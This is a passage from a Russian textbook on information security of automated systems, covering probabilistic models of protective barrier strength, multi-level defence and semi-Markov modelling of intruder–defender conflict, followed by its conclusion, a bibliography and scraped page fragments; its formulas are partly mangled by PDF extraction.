Действия нарушителя датчиками обнаружены, но у него есть время
для завершения своей "работы". Однако этот успех относителен, так как
нарушение зарегистрировано и через некоторое время будет определен
источник нарушения, а для нарушителя возникает опасность быть пой-
манным, если он не покинет места нарушения до прибытия группы за-
хвата.
В модели потенциального нарушителя мы условились, что ему из-
вестны значения Т и Т обл. Следовательно, на нарушение он идет, зная о
возможной такого рода ситуации, но только при определенных услови-
ях: при доступе к достаточно ценной информации и при значительном
превышении времени обнаружения и блокировки над затратами времени
на НСД, так как ему не обходимо дополнительное время, чтобы скрыть-
ся от преследования и иметь запас времени на случай неточности своих
313
расчетов. Величина ожидаемого tнр в конкретной АС зависит от многих
факторов:
 характера поставленной задачи нарушения;
 метода и способа нарушения;
 технических возможностей и квалификации нарушителя;
 технических возможностей автоматизированной системы.
Поэтому можно говорить о вероятностном характере величины tнр
по от ношению к Т обл. Чем больше время нарушителя, тем больше веро-
ятность его поимки. Чем больше время его обнаружения и блокировки,
тем меньше вероятность его поимки. Следовательно, если обозначить
вероятность обнаружения и блокировки НСД в этом случае через Робл,
целесообразно считать, что
t нр
Робл  . (18)
Т обл
Вероятность успеха нарушителя будет определяться как противо-

положное событие:
t нр
Рнр  1  . (19)
Т обл
Для более полного формального представления прочности прегра-

ды в виде автоматизированной системы обнаружения и блокировки НСД
необходимо учитывать надежность ее функционирования и пути воз-
можного обхода ее нарушителем.
Вероятность отказа системы определяется по формуле
Ротк (t )  e t , (20)
где –интенсивность отказов группы технических средств, состав-

ляющих систему обнаружения и блокировки НСД, t–рассматриваемый
интервал времени функционирования системы обнаружения и блоки-
ровки НСД.
Исходя из наиболее опасной ситуации, считаем, что отказ системы
контроля и НСД могут быть совместимыми событиями. Поэтому с уче-
том этой ситуации формула прочности контролируемой преграды (21)
примет вид
Pсзик  minРобл 1  Ротк , 1  Pобх1 , 1  Pобх2 ,...1  Pобхk  ,
(21)
314
где Ро6л и Ротк определяются соответственно по формулам (18) и
(19), Ро6х и количество путей обхода k определяются экспертным путем
на основе анализа принципов построения конкретной системы контроля
и блокировки НСД.
Расчетные соотношения для неконтролируемой преграды
В АС возможными неконтролируемыми каналами НСД могут быть
носители информации, съемные запоминающие устройства, линии и ка-
налы связи. Современные машинные носители имеют малые габариты и
могут быть легко похищены и брошенных в мусорную корзину носите-
лях и ремонтируемых накопителях жестких дисках может оставаться
секретная информация. Линии и каналы связи могут быть проложены в
местах, легко доступных для посторонних лиц, и т.д. Известно, что ин-
формация со временем теряет свою привлекательность и начинает уста-
ревать, а в отдельных случаях ее цена может упасть до нуля. Тогда за
условие достаточности защиты можно принять превышение затрат вре-
мени на преодоление преграды нарушителем над временем жизни ин-
формации.
К неконтролируемым возможным каналам НСД к информации сле-
дует также отнести ремонтируемые запоминающие устройства, машин-
ные и бумажные носители с остатками информации. Для защиты ин-
формации от нарушителя–непрофессионала, очевидно, будут достаточ-
ны обычные средства контроля стирания информации и уничтожения
носителей. Для более ответственных – необходимы дополнительные
средства: многократного наложения записи случайной последовательно-
сти символов на остатки информации и специальные сертифицирован-
ные устройства уничтожения носителей. Оценка данных средств защиты
и разработка соответствующих методик потребует специальных иссле-
дований. В настоящее время целесообразно воспользоваться методом
экспертных оценок, приведенным выше.
На основании изложенного, подводим некоторые итоги и делаем
вывод о том, что защитные преграды бывают двух видов: контролируе-
мые и неконтролируемые человеком. Прочность неконтролируемой пре-
грады рассчитывается по формулам (13) и (14), а контролируемой – по
формуле (21). Анализ данных формул позволяет сформулировать первое
правило защиты любого предмета: прочность защитной преграды явля-
ется достаточной, если ожидаемое время преодоления ее нарушителем
больше времени жизни предмета защиты или больше времени обнару-
315
жения и блокировки его доступа при отсутствии путей обхода этой пре-
грады.
6.5. Модель многозвенной защиты

На практике в большинстве случаев защитный контур (оболочка)
состоит из нескольких "соединенных" между собой преград с различной
прочностью.
Модель такой защиты из нескольких звеньев представлена на рис. 59.
Преграда 3
Преграда 1
Преграда 2
Рис. 59. Модель многозвенной защиты

Примером такого вида защиты может служить помещение, в кото-
ром хранится аппаратура. В качестве преград с различной прочностью
здесь могут служить стены, потолок, пол, окна и замок на двери.
Для вычислительной системы "соединение" преград (замыкание
оболочки защиты) имеет тот же смысл, но иную реализацию. Например,
система контроля вскрытия аппаратуры и система опознания и разгра-
ничения доступа, контролирующие доступ к периметру вычислительной
системы, на пер вый взгляд образуют замкнутый защитный контур, но
доступ к средствам отображения и документирования, побочному элек-
тромагнитному излучению и наводкам, носителям информации и другим
возможным каналам НСД к ин формации не перекрывают и, следова-
тельно, таковым не являются. Таким образом, в контур защиты в каче-
стве его звеньев войдут еще система контроля Доступа в помещения,
средства защиты от ПЭМИН, шифрование и т.д. Это не означает, что си-
стема контроля доступа в помещение не может быть замкнутым защит-
ным контуром для другого предмета защиты (например, для техниче-
ских средств вычислительной системы). Все дело в точке отсчета, в дан-
ном случае в предмете защиты, т.е. оболочка (контур) защиты не будет
316
замкнутой до тех пор, пока существует какая–либо возможность несанк-
ционированного доступа к одному и тому же предмету защиты.
Формальное описание прочности многозвенной оболочки защиты
практически полностью совпадает с выражениями (13), (14) и (21), так
как наличие нескольких путей обхода одной преграды, не удовлетворя-
ющих заданным требованиям, потребует их перекрытия другими соот-
ветствующими преградами, которые в конечном итоге образуют много-
звенную оболочку защиты.
Тогда выражение прочности многозвенной защиты из неконтроли-
руемых преград, построенной для противостояния одному нарушителю,
может быть представлено в виде
Pзи  minРсзи1 , Рсзи 2 ,..., Рсзиi 1  Pобх1 , 1  Pобх2 ,..., 1  Pобхk , (22)
где Рсзи –прочность i–й преграды,

Робх– вероятность обхода преграды по k– му пути.
Выражение для прочности многозвенной защиты, построенной из
неконтролируемых преград для защиты от организованной группы ква-
лифицированных нарушителей–профессионалов, с учетом совместимо-
сти событий может быть представлено в виде
РзиО  Рсзи1  Рсзи 2  ...  Рсзиi 1  Pобх1 , 1  Pобх2   ...  1  Pобхk  . (23)
Выражение для прочности многозвенной защиты с контролируе-

мыми преградами для защиты от одного нарушителя будет в следующем
виде
Рзиk  min Рсзиk1 , Рсзиk2 ,..., Рсзиkn 1  Pобх1 , 1  Pобх2   ...  1  Pобхj ,
(24)
где Рсзиkn –прочность n–й преграды,
Робхj– вероятность обхода преграды по j-му пути.
Для защиты от организованной группы нарушителей аналогично
подходу к выражению (23), т.е. считая действия нарушителей одновре-
менными, пре образуем формулу (24) и получаем формулу для расчета
прочности защит ной оболочки с контролируемыми преградами в виде
Рзиk0  Рсзиk1  Рсзиk2  ...  Рсзиkn 1  Pобх1 , 1  Pобх2   ...  1  Pобхj  . (25)
Изложенное, позволяет сформулировать нижеследующие правила

построения защитной оболочки.
317
Прочность многозвенной защитной оболочки от одного нарушителя
равна прочности ее слабейшего звена. Это правило справедливо и для
защиты от неорганизованной группы нарушителей, действующих само-
стоятельно.
Прочность многозвенной защиты от организованной группы нару-
шите лей равна произведению вероятностей не преодоления потенци-
альным нарушителем каждого из звеньев, составляющих эту защиту.
Здесь следует подчеркнуть, что расчеты итоговых прочностей за-
щиты для неконтролируемых и контролируемых преград должны быть
раздельными, поскольку исходные данные для них различны и, следова-
тельно, на разные задачи должны быть разные решения – две разные
оболочки защиты одного уровня. Кроме того, недопустимо при расчете
оболочки пользоваться временно двумя формулами, т.е. строить одну
оболочку для защиты от разных нарушителей. Если существует какая-
нибудь опасность проявления предмету защиты интереса организован-
ной группы нарушителей–профессионалов, необходимо для расчета вы-
брать формулы (23) и (24).
Если прочность слабейшего звена защиты удовлетворяет предъяв-
ленным требованиям оболочки защиты в целом, возникает вопрос об из-
быточности точности на остальных звеньях данной оболочки. Отсюда
следует, что экономически целесообразно применять в многозвенной
оболочке защиты равнопрочные преграды.
Если звено защиты не удовлетворяет предъявленным требованиям,
преграду в этом звене заменяем на более прочную или данная преграда
дублируется еще одной преградой, а иногда двумя и более преградами.
Но все дополнительные преграды должны перекрывать то же количе-
ство или более возможных каналов НСД, что и первая.
В этом случае, если обозначить прочность дублирующих друг друга
пре град соответственно через Р1, Р2, Р3...,Рi., вероятность преодоления
каждой из них нарушителем согласно теории вероятностей как противо-
положное событие может быть соответственно равна (1–Р,), (1–Р2), (1–
Р3), ...,(1–Рi.).
Считаем, что факты преодоления этих преград нарушителем собы-
тия совместимые. Это позволяет согласно той же теории вероятность
преодоления суммарной преграды нарушителем формально представить
в виде формулы
Рнр  (1  Р1 )(1  Р2 )(1  Р3 )...(1  Рi ) . (26)
318
Следовательно, вероятность непреодоления дублирующих преград
(прочность суммарной преграды) как противоположное событие будет
определяться выражением, приведенным в [4]:
Р  1  Рнр  1  (1  Р1 )(1  Р2 )(1  Р3 )...(1  Рi ) , (27)
где i– порядковый номер преграды,

Рi–прочность i–й преграды.
Эта формула справедлива для любых преград.
Иногда участок защитного контура (оболочки) с параллельными (с
дублированными) преградами ошибочно называют многоуровневой за-
щитой. В вычислительной системе защитные преграды часто перекры-
вают друг друга и по причине, указанной выше, и когда специфика воз-
можного канала НСД требует применения такого средства защиты
(например, системы контроля доступа в помещения, охранной сигнали-
зации и контрольно–пропускного пункта на территории объекта защи-
ты). Это означает, что прочность отдельной преграды, попадающей под
защиту второй, третьей и т.д. преграды, должна пере считываться с уче-
том этих преград по формуле (27). Соответственно может измениться и
прочность слабейшей преграды, определяющей итоговую прочность за-
щитной оболочки в целом.
6.6. Модель многоуровневой защиты

В ответственных случаях при повышенных требованиях к защите
применяется многоуровневая защита, модель которой представлена на
рис. 60.
Оболочка №1
Оболочка №2
Рис. 60. Модель многоуровневой защиты
319
Многоуровневой защитой будем называть защиту, построенную из
нескольких замыкающих друг друга защитных оболочек [20].
При расчете суммарной прочности нескольких оболочек (контуров)
защиты в формулу (27) вместо Pi включается Pki – прочность каждой
оболочки (контура), значение которой определяется по одной из формул
(22), (23) и (24), т.е. для контролируемых и неконтролируемых преград
опять расчеты должны быть раздельными и производиться для разных
оболочек (контуров), образующих каждый по отдельности свою много-
уровневую защиту:
Р  1  Рнр  1  (1  Рk1 )(1  Рk 2 )(1  Рk 3 )...(1  Рki ) . (28)
При Ркi=0 данная оболочка (контур) в расчет не принимается. При

Ркi=1 остальные оболочки защиты являются избыточными. Данная мо-
дель справедлива лишь для замкнутых оболочек защиты, перекрываю-
щих одни и те же каналы несанкционированного доступа к одному и то-
му же предмету защиты.
6.7. Общие подходы к моделированию конфликта

систем обеспечения информационной
безопасности и нарушителя на основе
полумарковских процессов
Удобным аппаратом, позволяющим отразить динамический и кон-

фликтный аспекты процессов конфликтного взаимодействия систем
обеспечения информационной безопасности и нарушителя в условиях
неопределенности факторов, влияющих на его развитие, являются про-
цессы с дискретным множеством состояний и непрерывным временем
[37]. Данный аппарат позволяет формализовать процесс через описание
дискретного множества его состояний с произвольными законами рас-
пределения времен их смены.
Система обеспечения информационной

S2 Сторона А
S1 320
S3 Сторона В
Нарушитель
Рис. 61. Граф состояний конфликта Поведение кон-
фликтной системы во
времени описывается
стохастическим процессом {Z (t ), t  0} , где Z (t ) означает состояние си-
стемы в момент t (вообще говоря, случайное). Множество  возможных
состояний системы называется пространством состояний для процесса
Z (t ) , который является фазовым процессом рассматриваемой системы.
Чаще всего будем предполагать, что множество  конечно и его можно
представить в виде        , где        , причем   (  )
означает множество выигрышных (проигрышных) состояний. Так, для
простого, приведенного на рис. 61 конфликта между системой обеспече-
ния информационной безопасности и нарушителем,   {2,3} ,    {2},
   {3}. Для монотонной системы с n элементами и структурной
функцией  есть множество n -мерных векторов z с бинарными компо-
нентами, а    {z, z , ( z )  1} .
Если система приняла состояние z из множества  , то она прово-
дит в нем некоторое время, вообще говоря, случайное, а затем вслед-
ствие действий противоборствующих сторон «скачкообразно» перехо-
дит в новое состояние. Таким образом, все реализации фазового процес-
са {Z (t )} являются кусочно-постоянными.
С математической точки зрения конфликт сторон А и B может быть
представлен ориентированным графом состояний, вершины которого
отражают состояния выигрыша в конфликте, дуги графа - направление
протекания конфликта. На рис. 61 представлен граф состояний, отража-
ющий динамику конфликта сторон А и B и описываемый как полумар-
ковский процесс. На нем приняты следующие обозначения:
S1 - исходное состояние конфликта;
S2 - система обеспечения информационной безопасности (сторо-
на А) осуществила обнаружение действий нарушителя и блоки-
ровала его (проигрыш стороны B);
S3 – нарушитель обошел (нейтрализовал) систему обеспечения
информационной безопасности стороны А и выполнил свои дей-
ствия (проигрыш стороны А).
Такая системная модель конфликта высокоорганизованных систем
предполагает, что конфликтующие стороны находятся в состоянии
априорной неопределенности о способах, средствах и стратегиях дей-
ствий систем противостоящей стороны, т.е. законы распределения вре-
мени перехода из одного состояния в другое являются случайными. В
321
этом случае, аналитическое описание динамики такой системы возмож-
но в виде полумарковского процесса с непрерывным временем и дис-
кретными состояниями с плотностью распределения вероятностей вре-
мени достижения ими цели ij (t ) . Подобные подходы широко использу-
ются при моделировании конфликтных процессов между радиоэлек-
тронными или оптико-электронными средствами (см. например [1; 22]).
Однако, в отличие от приведенных в приложении [22] аналитиче-
ских выражений, описание состояния выигрыша в конфликте должно
включать вероятностные характеристики успешности действий всего
цикла конфликтов противоборствующих сторон, например вероятность
блокирования работы сервера или вероятность вскрытия ключа или па-
роля. Так как, в этом случае, плотности распределения вероятностей
времени достижения ими цели ij (t ) характеризуют упреждение в цикле
«компьютерная разведка-инвентаризация сервисов и ресурсов-поиск
уязвимостей-проведение атаки-оценка эффективности» для блокирова-
ния работы сервера или упреждение в смене ключа или пароля при его
взломе, а указанные выше вероятности имеют физический смысл потен-
циальных возможностей по реализации блокирования работы сервера
или по вскрытию ключа (пароля) тем или иным методом.
Обозначим вероятность P( A B, t ) того, что в интервале времени
(t , t  dt ) сторона А выигрывает в конфликте со стороной B. Тогда,
например, для системы обнаружения атак (СОА), мгновенная вероят-
ность достижения цели системой СОА стороны А раньше, чем система
проведения атаки (СПА) стороны B осуществить ответное действие (см.
рисунок 62), равна
 t

B, t )  PСОА fСОА (t ) 1  PСПА  f СПА (t )d   PСОА f СОА (t ) 1  PСПАFСПА (t )  ,(29)
A A B B A A B B
PСОА ( A
 
 0 
A B
где PСОА , PСПА - вероятность достижения эффекта стороной А(B)
стороны B(А) при воздействии нарушителя;
A B
fСОА (t ), fСПА (t ) - плотности распределения времени подготовки к
действиям и достижения цели сторон;
B
FСПА (t ) - функция распределения времени достижения цели СПА
стороны B.
322
A A B B
PСОА fСОА (t ) PСПА fСПА (t )
t t+dt t
Рис. 62. Учет конфликтной обусловленности плотности вероятности

Это отражается укрупненным графом состояний, представленном
на рис. 63.
Для этих же обозначений мгновенная
S2
вероятность времени достижения цели си-
P12φ12(t)[1-P13F13(t)] стемой проведения атак стороны B раньше,
S1 чем система обнаружения атак стороны А
P13φ13(t)[1-P12F12(t)] осуществить ответное действие, будет рав-
на
S3
A, t )  PСПА fСПА (t ) 1  PСОА FСОА (t ) 
B B A A
PСПА ( B
 .
Рис. 63. Граф состояний
конфликта с учетом до- В выражении (29) сомножитель
стижения эффекта A A
PСОА fСОА (t ) определяет возможности осу-
ществления начала атаки, обнаружения и
нейтрализация атаки СОА стороны А в момент времени t, а сомножитель
 t

1  PСПА  fСПА (t )d  — вероятность, того, что СПА стороны B не успеет
B B
 0 
обойти или нейтрализовать СОА стороны А к моменту времени t с веро-
B
ятностью PСПА .
Для получения текущего значения вероятности достижения цели
стороной А в условиях конфликта достаточно проинтегрировать по вре-
мени выражение (29).
В свою очередь с учетом (29) и введенных обозначений мгновенная
вероятность нахождения в состоянии S2 ( S3 ) к моменту времени t может
для графа представленного на рис. 63 быть определена как
323
t t
P2 (t )  P12  f12 (t ) 1  P13 F13 (t )  dt  P12 F12 (t )  P13  f12 (t )F13 (t )dt ,
0 0
t t
P3 (t )  P13  f13 (t ) 1  P12 F12 (t )  dt  P13 F13 (t )  P12  f13 (t )F12 (t )dt , , (30)
0 0
P1 (t )  1  ( P2 (t )  P3 (t ))
где P12 ( P13 ) - вероятность достижения целей стороной А(B) сто-
роны B(А);
F12(13) , f12(13) - функции и плотности распределения времени осу-
ществления обнаружения атаки или блокирования СОА.
Анализ выражений (30) позволяет сделать ряд важных выводов. Во-
первых, всегда P12 F12 (t )  P2 (t ) , т.е. вероятность упреждения в конфликте
в присутствии противника будет стремиться к потенциально возможно-
му значению достижения цели при отсутствии конфликта, когда
F13 (t )  0 . Во-вторых, конфликтно-обусловленная вероятность P2 (t )
нахождения в состоянии S 2 определяется плотностью распределения
времени f12 (t ) перехода 1  2 и функцией распределения F13 (t ) , кото-
рая представляет собой возможности противника по достижению своей
цели. И, в-третьих, важную роль в зависимости вероятности P2 (t ) от
времени играют вероятности успешности обнаружения атак.
Таким образом, полученное выражение (30) позволяет аналитиче-
ски в общем виде описать полную группу событий конфликтного взаи-
модействия вне зависимости от вида законов распределения аппрокси-
мации.
Применительно к графу, представленному на рис. 61 можно запи-
сать полумарковскую систему уравнений динамики конфликта в пред-
положении экспоненциальной аппроксимации распределения вероятно-
сти времени получения преимущества. Руководствуясь основными по-
ложениями [1] применительно к состояниям S1-S3, представленных на
рис. 61, можно записать вероятности пребывания в этих состояниях
P1 (t )  e  ( 12 13 )t ,
12
P2 (t )  1  e  ( 12  13 ) t
 , (30)
12  13
13
P3 (t )  1  e  (  12  13 ) t
 ,
12  13
324
где ij – интенсивность перехода из состояния i в состояние j.
12
Для упрощения анализа введем в рассмотрение величину k  ,
13
характеризующую отношения интенсивностей переходов из состояния в
состояние конфликтной системы, тогда значения интенсивностей пере-
ходов S1 — S2 и S1 — S3 можно задать, как k 13 и 13 или без индексов
как k  и  соответственно.
Анализ основных статистических и временных характеристик не-
санкционированных воздействий и проведения атак позволил обосно-
вать значения интенсивностей переходов графа состояний, представлен-
ного на рис. 61. Результаты моделирования конфликта при   10, k  1.2
представлены на рис. 64.
Рис. 64. Зависимость вероятности пребывания в состоянии S2,S3 и S1

Анализ данных зависимостей подтверждает выводы о важности
начального этапа конфликта. Для   10, k  1.2 основной рост значений
вероятностей P2 (t ) и P3 (t ) до (90%) происходит в первые 50 минут кон-
фликта.
В интересах оценки зависимости пребывания в выигрышном состо-
янии стороны B от значений отношения интенсивностей переходов S1 —
S2 и S1 — S3 конфликтной системы k рассмотрим зависимости
P2 (k ) и P3 (k ) . Полученные графические зависимости представлены на
рис. 65.
325
Рис. 65. Зависимости вероятности пребывания в выигрышном
(проигрышном) состоянии
Не монотонный характер полученных зависимостей позволяет сде-
лать вывод о зависимости скорости убывания значений вероятности от
dP (k )
отношения k, т.е. производной f (k )  3 .
dk
Полученная графическая зависимость представлена на рис. 66.
Анализ характера поведения производной (см. рис. 66) позволяет
сделать вывод о том, что при k>2 скорость убывания значений вероятно-
сти пребывания в состоянии S2(3) резко снижается. Это говорит о доста-
точности двукратного превосходства защитной подсистемы в конфликте
с различной интенсивностью.
Рис. 66. Значения производной от

отношения интенсивностей переходов
326
конфликтной системы Таким образом, под-
ход к моделированию кон-
фликта системы обеспечения информационной безопасности и наруши-
теля включает следующие этапы: определение пространства состояний,
существенных с позиции обеспечения информационной безопасности в
конфликтной системе; разработка графа состояний; установление зави-
симости законов распределения времен переходов системы из состояния
в состояние от вероятностно-временных характеристик взаимодейству-
ющих систем; аналитическое описание процесса; определение началь-
ных условий и реализация модели с целью определения выбранного по-
казателя эффективности.
327
ЗАКЛЮЧЕНИЕ
Новые техника и технологии автоматизированных систем являются
прогрессивными во многих отношениях, но вместе с тем, они повышают
уязвимость этих систем к воздействию средств хакера. Поэтому разру-
шительные способности средств хакера должны учитываться при разра-
ботке и эксплуатации будущих автоматизированных систем. Ввиду того,
что средства хакера могут находиться в инкубационном состоянии среди
миллионов строк компьютерных программ и стать активными в крити-
ческий момент времени, схемы информационной защиты должны ини-
циироваться до того, как хакер применит такие средства. Кроме, того,
скрытый характер ведения тактических и стратегических действий, при-
водит к тому, что становится сложно определить как факт применения
средств хакера, так и хакера, который применил их.
Отдельные задачи, подходы к их решению, механизмы, модели и
инструментальные средства, представленные на обсуждение в этом
учебном пособии не претендуют на полноту охвата всех вопросов, свя-
занных с обеспечением информационной безопасности. Они формируют
лишь общее представление о положении дел и перспективах развития
этого направления.
Основной целью авторов было увязать теорию и практику защиты,
показать их взаимосвязь. Авторы надеются, что предлагаемый материал
поможет лучше разобраться в теории и практике обеспечения информа-
ционной безопасности, особенно в свете следующих двух ее основных
сторон. С одной стороны, беспрецедентно высокие темпы развития ин-
формационных технологий и автоматизированных систем, расширение
сферы их применения предъявляют новые требования к их защищенно-
сти. С другой стороны, приходится учитывать то обстоятельство, что
технологическая база существующих и перспективных АС изначально
не приспособлена для решения задач обеспечения информационной без-
опасности. На этом фоне многие подходы к реализации защиты инфор-
мационно-вычислительных ресурсов и сетевой инфраструктуры, лежа-
щие в их основе математические модели и алгоритмические решения
требуют серьезного анализа и коренного пересмотра. Вместе с тем, при-
менение технических средств может обеспечить эффективную защиту
только в совокупности с организационными мероприятиями. Таким об-
разом, комплексный подход к защите информации следует рассматри-
328
вать как в узком, так и в широком (комплексирование организационных
и технических мер защиты информации) смыслах.
От того, насколько быстро и эффективно такой пересмотр будет
осуществляться, как будут учитываться постоянно возрастающее количе-
ство и уровень деструктивности внешних и внутренних угроз безопасно-
сти автоматизированных систем во многом зависит будущее мирового
информационного пространства и информационной безопасности РФ.
В этом смысле, особенно актуальным видится подготовка специалистов,
осуществляющих свою деятельность в области защиты критически уяз-
вимых объектов информатизации.
Изложенный материал, по мнению авторов, позволит при подготовке
руководителей и специалистов в области обеспечения информационной
безопасности избежать многих ошибок, которые могут существенно по-
влиять на качество подготовки и эффективность их деятельности в це-
лом при эксплуатации автоматизированных систем различного назначе-
ния.
329
СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ
1. Аниканов А.В., Козирацкий Ю.Л., Кругов Н.Г., Лысиков В.Ф. Ме-
тодический подход к экспресс-анализу информационного кон-
фликта оптико-электронных средств и обоснованию требований к
ним. «Информационный конфликт в спектре электромагнитных
волн» 2001, №10 - приложение к журналу «Радиотехника».
2. Барсуков В.С., Водолазкий В.В. Современные технологии без-
опасности. М.: "Нолидж", 2000.
3. Безруков Н.Н. Компьютерная вирусология: Справочное руковод-
ство. — К.: УРЕ, 1991.
4. Белкин П.Ю., Михальский О.О., Першаков А.С. и др. Защита про-
грамм и данных: Учебное пособие для ВУЗов. – М.: Радио и связь,
1999.
5. Герасименко В.А. Защита информации в автоматизированных си-
стемах обработки данных. В 2-х кн. — М.: Энергоатомиздат, 1994
г. - 400 с.
6. ГОСТ Р 50922-2006 "Защита информации. Основные термины и
определения".
7. ГОСТ Р 51275-2006 "Защита информации. Объект информатиза-
ции. Факторы, воздействующие на информацию. Общие положе-
ния" (взамен ГОСТ Р 51275-96).
8. ГОСТ Р 52863-2007 "Защита информации. Автоматизированные
системы в защищённом исполнении. Испытания на устойчивость к
намеренным силовым электромагнитным воздействиям. Общие
требования".
9. ГОСТ Р ИСО/МЭК 15408-1-2002 "Информационная технология.
Методы и средства обеспечения безопасности. Критерии оценки
безопасности информационных технологий". Часть 1. Введение и
общая модель (на основе прямого применения международного
стандарта ИСО/МЭК 15408:99).
10. ГОСТ Р ИСО/МЭК 15408-2-2002 "Информационная технология.
безопасности информационных технологий". Часть 2. Функцио-
нальные требования безопасности (на основе прямого применения
международного стандарта ИСО/МЭК 15408:99).
11.ГОСТ Р ИСО/МЭК 15408-3-2002 "Информационная технология.
330
безопасности информационных технологий". Часть 3. Требования
доверия к безопасности (на основе прямого применения междуна-
родного стандарта ИСО/МЭК 15408:99).
12.Гостехкомиссия России. Концепция защиты СВТ и АС от несанк-
ционированного доступа к информации. М.: 1992.
13.Гостехкомиссия России. Руководящий документ. Автоматизиро-
ванные системы. Защита от несанкционированного доступа к ин-
формации. Классификация автоматизированных систем и требова-
ния по защите информации. М.: 1992.
14.Гостехкомиссия России. Руководящий документ. Временное по-
ложение по организации разработки, изготовления и эксплуатации
программных и технических средств защиты информации от не-
санкционированного доступа в автоматизированных системах и
средствах вычислительной техники. М.: 1992.
15.Гостехкомиссия России. Руководящий документ. Защита от не-
санкционированного доступа к информации. Термины и опреде-
ления. М., 1992.
16.Гостехкомиссия России. Руководящий документ. Положение о
сертификации средств защиты информации по требованиям без-
опасности информации.. - М.: Военное издательство, 1995.
17.Гостехкомиссия России. Руководящий документ. Средства вычис-
лительной техники. Защита от несанкционированного доступа к
информации. Показатели защищенности от НСД к информации.
М.: 1992.
18.Грушо А.А., Тимонина Е.Е. Теоретические основы защиты ин-
формации. М.: Издательство агентства "Яхтсмен", 1996, 192с.
19.Девянин П.Н., Михальский О.О., Правиков Д.И., Щербаков А.Ю.
Теоретические основы информационной безопасности. — М.: Ра-
дио и связь, 1999.
20.Доктрина информационной безопасности Российской Федерации.
Утверждена Президентом Российской Федерации 9 сентября
2000 г.
21.Домерев В.В. Защита информации и безопасность компьютерных
систем.- Киев. Издательство «Диасофт». 1999.
22. Дружинин В.В., Конторов Д.С., Конторов М.Д. Введение в тео-
рию конфликта.- М.: Радио и связь, 1989.
23.Зима В.М., Молдовян А.А., Молдовян Н.А. Безопасность глобаль-
ных сетевых технологий. - СПб.: БХВ- Петербург, 2000.
331
24.Касперский Е. Компьютерные вирусы в MS-DOS. — М.:
"ЭДЭЛЬ", 1992.
25.Компьютерные сети. Принципы, технологии, протоколы / В.Г.
Олифер, Н.А. Олифер.- СПб.: Питер, 2000.
26.Корт С.С. Теоретические основы защиты информации: Учебное
пособие. – М.: Гелиос АРВ, 2004.
27.Лукацкий А. В. Обнаружение атак. – 2-е изд., перераб. и доп. –
СПб.: БХВ-Петербург, 2003.
28.Малюк А.А., Пазизин С.В., Погозин Н.С. Введение в защиту ин-
формации в автоматизированных системах. – М.: Горячая линия
Телеком, 2004г. – 147 с.
29.Медведовский И.Д., Семьянов П.В., Платонов В.В. Атака через
Internet, СПб, НПО "Мир и семья-95", 1997.
30.Мельников В. В. Защита информации в компьютерных системах.
М., "Финансы и статистика", 1997.
31.Милославская Н.Г., Толстой А.И. Интрасети: доступ в Internet, за-
щита. Учебное пособие для вузов. - М.: ЮНИТИ- ДАНА, 2000.
32.Положение о лицензировании деятельности по технической защи-
те конфиденциальной информации. Утверждено постановлением
Правительства Российской Федерации от 15.08.2006 № 504.
33.Положение о Федеральной службе по техническому и экспортно-
му контролю. Утверждено Указом Президента Российской Феде-
рации от 16.08.2004 № 1085.
34.Расторгуев С.П., Информационная война. М.:, Радио и Связь, 1998.
35.Руководящий документ. Безопасность информационных техноло-
гий. Критерии оценки безопасности информационных технологий.
Утвержден приказом председателя Гостехкомиссии России
от 19.06.2002 № 187.
36.Руководящий документ. Безопасность информационных техноло-
гий. Положение по обеспечению безопасности при разработке, ис-
пытаниях, поставке и эксплуатации изделий информационных
технологий. Утвержден заместителем директора ФСТЭК России
18.01.2008.
37.Сильвестров Д.С. Полумарковские процессы с дискретным мно-
жеством состояний (основы расчета функциональных и надеж-
ностных характеристик стохастических систем). – М.: Сов. радио,
1980.- 272 с. (Б-ка инженера по надежности).
38.Скляров Д.В. Искусство защиты и взлома информации.- СПб.:
БХВ- Петербург, 2004.
332
39.Соколов А., Степанюк О. Защита от компьютерного терроризма. -
СПб.: БХВ- Петербург, 2002.
40.Специальные требования и рекомендации по технической защите
конфиденциальной информации (СТР-К). Утверждены приказом
Гостехкомиссии России от 30.08.2002 №282.
41.Теория и практика обеспечения информационной безопасности.
Под редакцией П.Д.Зегжды. — М.: Издательство Агентства
"Яхтсмен", 1996.
42.Федеральный закон от 08.08.2001 № 128-ФЗ "О лицензировании
отдельных видов деятельности".
43.Федеральный закон от 27.07.2006 № 149-ФЗ "Об информации, ин-
формационных технологиях и о защите информации".
44.Федеральный закон от 27.12.2002 № 184-ФЗ "О техническом регу-
лировании".
45.Шрамко В. Аппаратно-программные средства контроля доступа.
«PCWeek/RE», N9, 2003.
46.Щеглов А.Ю. Защита компьютерной информации от несанкцио-
нированного доступа. – СПб: Наука и техника, 2004.
333
ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ
АВТОМАТИЗИРОВАННЫХ СИСТЕМ
334

Информационная безопасность автоматизированных систем posobie - ib - as - vtoroeizdanie-6 - 3 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Информационная безопасность автоматизированных систем posobie - ib - as - vtoroeizdanie-6 - 3 PDF

Загружено:

Авторское право:

Доступные форматы

ЦЕНТР ПОВЫШЕНИЯ КВАЛИФИКАЦИИ СПЕЦИАЛИСТОВ

ПО ТЕХНИЧЕСКОЙ ЗАЩИТЕ ИНФОРМАЦИИ

С.А. Будников, Н.В. Паршин

Издание второе, расширенное и доработанное

С.А. Будников, Н.В. Паршин

В учебном пособии излагаются основные понятия и определе-

ISBN 978-5-87456-944-0 Будников С.А., Паршин Н.В., 2011

1.2. Основные термины и определения

1.3. Правовые основы защиты информации

Законы РФ, Законы РФ Документы РФ,

ФЗ от 27.07.2006 N 152-ФЗ ФЗотот10.01.2002

Рис. 1. Структура законодательной базы информационной без-

1.3.1. Цели защиты информации

Основными целями защиты информации Федеральный Закон №

1.4. Категории информации

Ограниченные к распространению сведения Общедоступная информация

Сведения, содержащие Сведения, содержащие Сведения, которые не могут быть

Личные сведения Служебная

Персональные Профессиональная Коммерческая

Рис. 2. Структура информационных ресурсов в РФ

1.4.1. Режимы защиты информации

В соответствии с "Законом об информации" режим защиты инфор-

1.5. Классификация компьютерных преступлений

С 18.01.2005г. в УК РФ введена новая уголовная ответственность за

1.6. Руководящие документы ФСТЭК России

Показатели защищенности средств вычислительной техники от

Третья группа Вторая группа Первая группа

Рис. 3. Классы защищенности информации в АС

Распределение по классам защищенности

Рис. 4. Распределение АС по классам защищенности

